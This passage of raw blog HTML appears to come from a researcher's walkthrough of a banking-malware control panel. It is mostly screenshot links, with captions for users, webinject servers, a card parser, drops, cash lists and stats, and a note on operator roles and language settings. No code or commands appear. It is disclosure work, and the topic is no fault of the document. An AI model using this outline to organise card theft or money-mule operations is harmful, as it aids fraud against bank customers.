src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSdgqk2Qs3fbzpEnSlpwxpjzXZk2PlgM9qtIh5Y5kcH3qYU8SfQDVcYlZI9Y7Je-hDXizjr1ZfOcmqpkolCzVfuHL7_DEVbx61qenqyxIoKFrvqPWvxw6W1d0SsTdSQbei5ho-VrrA3zQ/s400/2015-11-02_17-35-24.png" width="400" /></a></div> Jabber adress:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPEac44T9dJ5YBN1tW9VeSsqCvju2QKKhASehbwh9491dkxTtbGVqJegiTmqS9rcyiG0cWPEco5KdtzbjET2RpyAElBTT8HopEJhIF9u3dbqIBl2WMVjq6E_2zYntKiJw93T-odyon584/s1600/2015-11-03_23-32-58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPEac44T9dJ5YBN1tW9VeSsqCvju2QKKhASehbwh9491dkxTtbGVqJegiTmqS9rcyiG0cWPEco5KdtzbjET2RpyAElBTT8HopEJhIF9u3dbqIBl2WMVjq6E_2zYntKiJw93T-odyon584/s1600/2015-11-03_23-32-58.png" /></a></div> <br /> User:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8DYGqVLjmKpXiyf2OaxJ9d7DC7iD2e2Eta2HCRCJeKRxbgJA1BxxOGjucS1KnoW45sIdNFJCvwAUIMw7NrOSfXJP7IiaJ18zF8da1fweL0UoECdMfat60B1ABDQwe3K_yCP0r7yqjhpU/s1600/2015-11-02_17-36-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8DYGqVLjmKpXiyf2OaxJ9d7DC7iD2e2Eta2HCRCJeKRxbgJA1BxxOGjucS1KnoW45sIdNFJCvwAUIMw7NrOSfXJP7IiaJ18zF8da1fweL0UoECdMfat60B1ABDQwe3K_yCP0r7yqjhpU/s400/2015-11-02_17-36-16.png" width="400" /></a></div> <br /> Users:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAzXUxXmmbCjouYLQgn1o_MqgKPInPAHEZ7JVxGRKy4wcro8mUQxwD8n31S7PqNck4Sw5E_s0hGdgVccvER-mtDxX0khIMu_NzwxUoujFWpmC7sRSSvIAuYhscGMzDQORJLRqBznooSqg/s1600/2015-11-02_17-36-40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAzXUxXmmbCjouYLQgn1o_MqgKPInPAHEZ7JVxGRKy4wcro8mUQxwD8n31S7PqNck4Sw5E_s0hGdgVccvER-mtDxX0khIMu_NzwxUoujFWpmC7sRSSvIAuYhscGMzDQORJLRqBznooSqg/s400/2015-11-02_17-36-40.png" width="400" /></a></div> <br /> Different admins with different rights:<br /> Some users have limited actions, for exemple one guys had only access to malware upload feature, probably to refresh the crypt.<br /> 6 users including the master user is using russian language on the panel, the rest is configured on english language.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH2u22_TJ3i_IG0vcjAsXJnI4RueGWCpd3KLLAG6kiKBn0gX8UZUrZG8KU7DK4eFbEA7OiLHaiiEqtVcIxwm0vf3TQMPVz8TXsBlSTDWySwZO9do3yK630kB8F5pwwnTwhCeJfPT1yaew/s1600/2015-11-02_17-37-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH2u22_TJ3i_IG0vcjAsXJnI4RueGWCpd3KLLAG6kiKBn0gX8UZUrZG8KU7DK4eFbEA7OiLHaiiEqtVcIxwm0vf3TQMPVz8TXsBlSTDWySwZO9do3yK630kB8F5pwwnTwhCeJfPT1yaew/s400/2015-11-02_17-37-43.png" width="400" /></a></div> <br /> Install:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFBkla7Lt0pojh7pHDAyM4jKMdk3Zu9zMUwEMqiI66YQVUhEqGS0yr_h_o-nNJdGhteo4XJIddlGY50l5mWUMnk-aGhXvzPmhlQDyBuUR4Goxw2RNX7-LR0s2OqnxniXbRkdGX4ese7Qg/s1600/2015-11-02_17-40-06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFBkla7Lt0pojh7pHDAyM4jKMdk3Zu9zMUwEMqiI66YQVUhEqGS0yr_h_o-nNJdGhteo4XJIddlGY50l5mWUMnk-aGhXvzPmhlQDyBuUR4Goxw2RNX7-LR0s2OqnxniXbRkdGX4ese7Qg/s400/2015-11-02_17-40-06.png" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHLcOUAqAe6_0RbA9AFQ0pO8hgPd7YWt_uOrqjRnRAgSnJwzPSaUaoFmhcn2wgGyAAyWPrGp6KfSpebuYByCgzmmMU_DuA7Nz6k9yBLuX-r1p2MnB80r1RsshQmwurZyp-glTk2hHFvyE/s1600/2015-11-03_23-53-40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHLcOUAqAe6_0RbA9AFQ0pO8hgPd7YWt_uOrqjRnRAgSnJwzPSaUaoFmhcn2wgGyAAyWPrGp6KfSpebuYByCgzmmMU_DuA7Nz6k9yBLuX-r1p2MnB80r1RsshQmwurZyp-glTk2hHFvyE/s400/2015-11-03_23-53-40.png" width="380" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAUfgN-pq_1bHgCz_g9AshoLEAPI5jHTDU9G3b62pULmbhewTOS3Hznm3zZwDd_OoTrezu5qRs02VGpPJtHDq_O3xkVD1aNWe8GU1D8aj2YDo4M8kRhysxgLPTnciARyELtR7iqyr56SM/s1600/2015-11-02_17-39-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAUfgN-pq_1bHgCz_g9AshoLEAPI5jHTDU9G3b62pULmbhewTOS3Hznm3zZwDd_OoTrezu5qRs02VGpPJtHDq_O3xkVD1aNWe8GU1D8aj2YDo4M8kRhysxgLPTnciARyELtR7iqyr56SM/s1600/2015-11-02_17-39-11.png" /></a></div> <br /> Files:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiD_bxCbf7XxtE9An-V80mBitEsvXq07p-QLqTKPHZFTbOUy3Sc87p2YNqtLsCZRXr4NfeCnEX4f2_pgHg_80viUxP6yTg7rn3SlnYwH9-LFB2ScFCIfzsVdcWHFh7JImBvbqkAa-QAppw/s1600/2015-11-02_17-41-37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="386" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiD_bxCbf7XxtE9An-V80mBitEsvXq07p-QLqTKPHZFTbOUy3Sc87p2YNqtLsCZRXr4NfeCnEX4f2_pgHg_80viUxP6yTg7rn3SlnYwH9-LFB2ScFCIfzsVdcWHFh7JImBvbqkAa-QAppw/s400/2015-11-02_17-41-37.png" width="400" /></a></div> <br /> CC parser:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWnTBLItS8y5d4MPp5DGJPzKabPHX_LxQdNsTduS-tAqIJaVypcvvl4YZTnC4Wv53wF3r5e_n-DsK5BUEfZogofmdenFX1tfnaG5OrR3Ws85s_tLG2SO-0jBKxxDjH5gAV7cqsuGvVrgU/s1600/2015-11-03_19-10-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWnTBLItS8y5d4MPp5DGJPzKabPHX_LxQdNsTduS-tAqIJaVypcvvl4YZTnC4Wv53wF3r5e_n-DsK5BUEfZogofmdenFX1tfnaG5OrR3Ws85s_tLG2SO-0jBKxxDjH5gAV7cqsuGvVrgU/s400/2015-11-03_19-10-23.png" width="400" /></a></div> <br /> Webinject server:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL1RdlZXuy5i6opuot_R-RXy-TOS3MRffG97BpsMVSaF2OuJw7DP1vTncQj11JBFRXVAOKR4WVoB4JwKYnnIia-HFWFziHnqp_pqg8g_vF9uSJiijudW74EkmjtNju66xR_ezjk1kWR00/s1600/2015-11-02_18-17-18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="347" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL1RdlZXuy5i6opuot_R-RXy-TOS3MRffG97BpsMVSaF2OuJw7DP1vTncQj11JBFRXVAOKR4WVoB4JwKYnnIia-HFWFziHnqp_pqg8g_vF9uSJiijudW74EkmjtNju66xR_ezjk1kWR00/s400/2015-11-02_18-17-18.png" width="400" /></a></div> <br /> Dashboard:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0T3PrRPyxpKuqbFVeVpl2DRVREP36jnc-dObbv2l5fWkbsBj3gX6pSbfWraPlXKJDHcvNFxA7-XrUkNrePgq_FVym6i1nOnsdqvjV-MmJGl91HN8FhXU41DJnEjmlj7kxDEw5dzHYsmE/s1600/2015-11-02_18-06-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0T3PrRPyxpKuqbFVeVpl2DRVREP36jnc-dObbv2l5fWkbsBj3gX6pSbfWraPlXKJDHcvNFxA7-XrUkNrePgq_FVym6i1nOnsdqvjV-MmJGl91HN8FhXU41DJnEjmlj7kxDEw5dzHYsmE/s400/2015-11-02_18-06-11.png" width="400" /></a></div> <br /> View:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrSNM5_BNi5P91VDgBLpva7wJQ8x4QKAw1GIbAagbDYcZ843LcEbCsmlKP0DjcMLQgPqH6NtqiW7wHdHx6XV1lR5N2ky79P3lFG0gFKuA3eENEEXGo0AWU4Z6gQDxetBCgKoOANLl745w/s1600/2015-11-02_18-09-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrSNM5_BNi5P91VDgBLpva7wJQ8x4QKAw1GIbAagbDYcZ843LcEbCsmlKP0DjcMLQgPqH6NtqiW7wHdHx6XV1lR5N2ky79P3lFG0gFKuA3eENEEXGo0AWU4Z6gQDxetBCgKoOANLl745w/s400/2015-11-02_18-09-23.png" width="400" /></a></div> <br /> Settings:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-3NhZqk5y3e-Q8YyQRkwQNEnkCijf1Acm2qMqrpHPPUZQse4Y6Tr4-BHdgRdBoNbQwr2TBq_-86e4D-Ax5mTDBH8_p_sX-9CwUj4fPSYAXo_L8RvKxpGQqNtm40ntsP8_8E5bwkvWoy4/s1600/2015-11-02_18-13-29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-3NhZqk5y3e-Q8YyQRkwQNEnkCijf1Acm2qMqrpHPPUZQse4Y6Tr4-BHdgRdBoNbQwr2TBq_-86e4D-Ax5mTDBH8_p_sX-9CwUj4fPSYAXo_L8RvKxpGQqNtm40ntsP8_8E5bwkvWoy4/s400/2015-11-02_18-13-29.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieB0usCnwX2W1-y5Zu5nb3kAMM7FSz96WiIknM_cMa1xJYwtvt6xdgj06M7CKkWyQxzW3oPfDMWZP5QdyCjiqizG1iYkfSEoPJVXx6cSQR2hzGSc3lY6imPuMV_ht6BZrfeHoIr8cOOBM/s1600/2015-11-02_18-14-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieB0usCnwX2W1-y5Zu5nb3kAMM7FSz96WiIknM_cMa1xJYwtvt6xdgj06M7CKkWyQxzW3oPfDMWZP5QdyCjiqizG1iYkfSEoPJVXx6cSQR2hzGSc3lY6imPuMV_ht6BZrfeHoIr8cOOBM/s400/2015-11-02_18-14-02.png" width="400" /></a></div> <br /> Replacer settings:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfbOtuaA-Uiku9L3P-Ve75v0qLObTDka2eHknirEFoJ8nIZpZgf2TfoL6xcKXMthWd4CBVy_ZMghtu43I8z3FdsPTcu3TcehAUjeh6RtZOpVtNmu_eDT5lkVqFiAP46IgnbrjtWOW_mO4/s1600/2015-11-02_18-14-55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfbOtuaA-Uiku9L3P-Ve75v0qLObTDka2eHknirEFoJ8nIZpZgf2TfoL6xcKXMthWd4CBVy_ZMghtu43I8z3FdsPTcu3TcehAUjeh6RtZOpVtNmu_eDT5lkVqFiAP46IgnbrjtWOW_mO4/s400/2015-11-02_18-14-55.png" width="400" /></a></div> <br /> Chat:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmlLjL_AIXk-U9MfGXZUAAB-bZe5evs2gMlyzeB-9A829FL7tGi4pSukZTDVh9Uj5DXVbf5oeNf-LDRUu1Cl3HU8XX_ycSDQNxBZW-1i7LBPcBOKocesUgcq8ea_Yj6eo8Jc_l_fTpsg4/s1600/2015-11-29_13-02-54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="363" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmlLjL_AIXk-U9MfGXZUAAB-bZe5evs2gMlyzeB-9A829FL7tGi4pSukZTDVh9Uj5DXVbf5oeNf-LDRUu1Cl3HU8XX_ycSDQNxBZW-1i7LBPcBOKocesUgcq8ea_Yj6eo8Jc_l_fTpsg4/s400/2015-11-29_13-02-54.png" width="400" /></a></div> <br /> Drop:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFD9-PS4fzdw614mDkdzKrN0IsL08aqeN2CiohciWYqIF3uNHWpAtisBnisXxLoR1SPUJ04q22vmUfwMRieVH2DGtThzix6covdtfvKYpnxLVuLLu_GnLB-0p6lTyBndr_yQlxvoQFo0A/s1600/2015-11-29_13-04-29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFD9-PS4fzdw614mDkdzKrN0IsL08aqeN2CiohciWYqIF3uNHWpAtisBnisXxLoR1SPUJ04q22vmUfwMRieVH2DGtThzix6covdtfvKYpnxLVuLLu_GnLB-0p6lTyBndr_yQlxvoQFo0A/s400/2015-11-29_13-04-29.png" width="400" /></a></div> <br /> Fakes:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT7X7GWAhUoRkXlOcl9ILlW62zbbCB9SyeZ09kkViLE_gqNrr1Umn9La-PwHurWHGvB0RIszijWwr-qmj3NnjVY_VHRyztJOIswqkqbFw8jrOLJNLBhuxVx0_0NzgXZaV6jl6kECIvEN0/s1600/2015-11-29_13-06-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT7X7GWAhUoRkXlOcl9ILlW62zbbCB9SyeZ09kkViLE_gqNrr1Umn9La-PwHurWHGvB0RIszijWwr-qmj3NnjVY_VHRyztJOIswqkqbFw8jrOLJNLBhuxVx0_0NzgXZaV6jl6kECIvEN0/s400/2015-11-29_13-06-11.png" width="400" /></a></div> <br /> WebInject server 2:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsZKFRLkYG-Z0jM1Bcr724NyYHCdru7CHzuc0AWXG4egViXgPIvGrf-JcRvLgdpHQzV1f1eXjoAUTwo_Dyt51YN68FRMfca6e31DMSCpU7wVvpBE8CkCVk-UkrvVB8ZmBHs6zXXKJL-g8/s1600/2015-11-17_13-41-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsZKFRLkYG-Z0jM1Bcr724NyYHCdru7CHzuc0AWXG4egViXgPIvGrf-JcRvLgdpHQzV1f1eXjoAUTwo_Dyt51YN68FRMfca6e31DMSCpU7wVvpBE8CkCVk-UkrvVB8ZmBHs6zXXKJL-g8/s400/2015-11-17_13-41-01.png" width="400" /></a></div> <br /> Dashboard:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnM0cSOJpNKglqlno6FJ4Ooqnn3DbDFFwXcpFl6_qtJ1RrvjAqOSpqzmja2hpwt5nPp3kw6wkazlPS6b6IdEv32ka4DgUtkKoGHj9gEbKL2twibUa8m50vYQ4cu0dV6axtEydORvcQ8v8/s1600/2015-11-17_13-43-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnM0cSOJpNKglqlno6FJ4Ooqnn3DbDFFwXcpFl6_qtJ1RrvjAqOSpqzmja2hpwt5nPp3kw6wkazlPS6b6IdEv32ka4DgUtkKoGHj9gEbKL2twibUa8m50vYQ4cu0dV6axtEydORvcQ8v8/s400/2015-11-17_13-43-16.png" width="400" /></a></div> <br /> Command:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdYUBs8x6qDdhxShXe1UiuXwfON4vPX1EDBW8KgwkqI_vNXDCzxIk7Y71Z0yjiY-NjdcwpzfMS0FUoo8ke9tbt1q4fCmcynB6t4jVybH0cPOkzL8tGxaeHHepGVh3g8e8viyNScm1WO48/s1600/2015-11-17_13-55-17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdYUBs8x6qDdhxShXe1UiuXwfON4vPX1EDBW8KgwkqI_vNXDCzxIk7Y71Z0yjiY-NjdcwpzfMS0FUoo8ke9tbt1q4fCmcynB6t4jVybH0cPOkzL8tGxaeHHepGVh3g8e8viyNScm1WO48/s400/2015-11-17_13-55-17.png" width="400" /></a></div> <br /> Logs:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2qMGEQ_F9zKxQfHd2jahLhewq60vWix92mmknPYi6iC1m3mEaKx22tm36M2KWEgcfCnyBqZynmPrvWwOvFduKOz1OggMzj3dMbWVb2WYR8nFCRZZPH5MBJQkn3AkRVQ9J-6brZHkqFTc/s1600/2015-11-17_13-57-04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2qMGEQ_F9zKxQfHd2jahLhewq60vWix92mmknPYi6iC1m3mEaKx22tm36M2KWEgcfCnyBqZynmPrvWwOvFduKOz1OggMzj3dMbWVb2WYR8nFCRZZPH5MBJQkn3AkRVQ9J-6brZHkqFTc/s400/2015-11-17_13-57-04.png" width="400" /></a></div> <br /> Cash list:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho6J0UqAOENAJTDUEWfmVdk33SvL4_rxi6W6yLYkGZ-wIortbPdJUaVitf4-cZeBGWGRToikuuh9prndyGdAQyJ-1rh-Hh1iip3JiTTv5GXZH0PBMGa8I47fT93NqjK6PEzQFq49aLtaI/s1600/2015-11-17_14-00-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho6J0UqAOENAJTDUEWfmVdk33SvL4_rxi6W6yLYkGZ-wIortbPdJUaVitf4-cZeBGWGRToikuuh9prndyGdAQyJ-1rh-Hh1iip3JiTTv5GXZH0PBMGa8I47fT93NqjK6PEzQFq49aLtaI/s400/2015-11-17_14-00-16.png" width="400" /></a></div> <br /> Stats:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0giFfAa3wtN0hUeXvenCrvPy1BRIHUO9nxMMrxdy1tr519IGFjQvcuvypv33y-jQxyKhpB6KhZ2Fw447AwuqBNJnlW2OduuAOawQuL1Ycap1xldCc1Z-pLxQHKM32AgM2QUVbqXuYoAQ/s1600/2015-11-17_13-48-44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0giFfAa3wtN0hUeXvenCrvPy1BRIHUO9nxMMrxdy1tr519IGFjQvcuvypv33y-jQxyKhpB6KhZ2Fw447AwuqBNJnlW2OduuAOawQuL1Ycap1xldCc1Z-pLxQHKM32AgM2QUVbqXuYoAQ/s400/2015-11-17_13-48-44.png" width="400" /></a></div> <br /> Drops:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8y5KeFTznGM4_Nl2z8sJzLjBWpBOwn4HgCD9NMo12MaQ4xkpUpY6bvd3KqogWBr_BVo7A1iF0idGL8Lbds462WrX8C2-dv6najg_RxUGJvh7gfzaXy3ncBuAkAaHq52ea6t5w6W3kkSk/s1600/2015-11-17_13-44-17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8y5KeFTznGM4_Nl2z8sJzLjBWpBOwn4HgCD9NMo12MaQ4xkpUpY6bvd3KqogWBr_BVo7A1iF0idGL8Lbds462WrX8C2-dv6najg_RxUGJvh7gfzaXy3ncBuAkAaHq52ea6t5w6W3kkSk/s400/2015-11-17_13-44-17.png" width="400" /></a></div> <br /> State stats:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHK7sUEEmJ6E2-9hiHf6xJIJYwgzJQCvhIceAqCPrSnWEk_iQHqB17XEFLG36oxvmTmBXk73XFrwjTi-AGYCNq6V3-p8trWukXvUGKVmmd4BnHh85ZX7YrqNyFp1oKpenXAsa0-mwmVeQ/s1600/2015-11-17_13-50-19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="131" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHK7sUEEmJ6E2-9hiHf6xJIJYwgzJQCvhIceAqCPrSnWEk_iQHqB17XEFLG36oxvmTmBXk73XFrwjTi-AGYCNq6V3-p8trWukXvUGKVmmd4BnHh85ZX7YrqNyFp1oKpenXAsa0-mwmVeQ/s400/2015-11-17_13-50-19.png" width="400" /></a></div> <br /> User management:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjglBjD15_90qJXVNtkfJIvNis-zDsDVUJ0HyFEn3YsPYw0K3cRmziPM70cI16jXnlsV9oDOOwxsLiw1TYOEVYQ1QU4zcyixbgpBZTgURGIzDHJCQn34yvQ-AsH66tPtcKzsyE3eoiGOfA/s1600/2015-11-17_13-51-08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjglBjD15_90qJXVNtkfJIvNis-zDsDVUJ0HyFEn3YsPYw0K3cRmziPM70cI16jXnlsV9oDOOwxsLiw1TYOEVYQ1QU4zcyixbgpBZTgURGIzDHJCQn34yvQ-AsH66tPtcKzsyE3eoiGOfA/s400/2015-11-17_13-51-08.png" width="400" /></a></div> <br /> Export CSV:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTC0r-4LeZa3apvSXp7qAiJotrKpipZQj6qNMgEKzjEJtzO34wBan7BXkgmq4Zn8LMY0v_xmmRmr04ERIMMxrFtVDGuQ8656KyNqiwwtyDcZfO_3-A8NOp07x6-8uMHG8-l8DfSFtld_A/s1600/2015-11-17_13-51-48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTC0r-4LeZa3apvSXp7qAiJotrKpipZQj6qNMgEKzjEJtzO34wBan7BXkgmq4Zn8LMY0v_xmmRmr04ERIMMxrFtVDGuQ8656KyNqiwwtyDcZfO_3-A8NOp07x6-8uMHG8-l8DfSFtld_A/s400/2015-11-17_13-51-48.png" width="400" /></a></div> <br /> Help:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAwEdaHaw3QUhPV9Z013dxvILJno7Mu0tNPKWml3YrY3rtzWzUOlP1v1cEMvT5luiiDRalcKW4DL6BfdQOkTw5v7b0IFUMWpTIDgZ-I4T0GNnJkVB_hw9csZlo-HL2CeY1L0zfenfPzjA/s1600/2015-11-17_13-52-36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAwEdaHaw3QUhPV9Z013dxvILJno7Mu0tNPKWml3YrY3rtzWzUOlP1v1cEMvT5luiiDRalcKW4DL6BfdQOkTw5v7b0IFUMWpTIDgZ-I4T0GNnJkVB_hw9csZlo-HL2CeY1L0zfenfPzjA/s400/2015-11-17_13-52-36.png" width="400" /></a></div> <br /> /s/ panel:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVWfovNpTY0Tn82DgfJ9LPFzCZFv7KgEaiVjXjMbLQGNxOjEJhg0SSemRGA51mrYzxP-QKzb4dBbGVNE7XvF8dBJMgh-BHGkeAdFZs3ePfDdaq3M0nIodqgIYhD7fwAESHphUmp5TdAKY/s1600/2015-11-17_14-01-28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVWfovNpTY0Tn82DgfJ9LPFzCZFv7KgEaiVjXjMbLQGNxOjEJhg0SSemRGA51mrYzxP-QKzb4dBbGVNE7XvF8dBJMgh-BHGkeAdFZs3ePfDdaq3M0nIodqgIYhD7fwAESHphUmp5TdAKY/s400/2015-11-17_14-01-28.png" width="400" /></a></div> <br /> Show infos:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIPBFjrQqtxJS6-ts13z0Shht7792JKn_BqhVmtKxp0PpekhARb88OI6l7KhtIMQZkJM2g15qocZmlLoFp-CKNudecfR81Z_v7_tSNYhyDBJc8LM-8L0AA-SObp8Ak6eX72F60L67HKuM/s1600/2015-11-17_14-06-42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIPBFjrQqtxJS6-ts13z0Shht7792JKn_BqhVmtKxp0PpekhARb88OI6l7KhtIMQZkJM2g15qocZmlLoFp-CKNudecfR81Z_v7_tSNYhyDBJc8LM-8L0AA-SObp8Ak6eX72F60L67HKuM/s400/2015-11-17_14-06-42.png" width="400" /></a></div> <br /> State stats:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk1CWRGmXr4wacpyk1fWKT5n98a9NjF031uFcAYO1u3Nf3nFENw3PKbWvpYy1BoIizJ9NidJTQy5cdiZCF0AD3DD-BVoJ-lHdakawyeUi_Ie8Kg3kW88oYqUOlx-S23hzAZy2VYkuhoeI/s1600/2015-11-17_14-08-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" 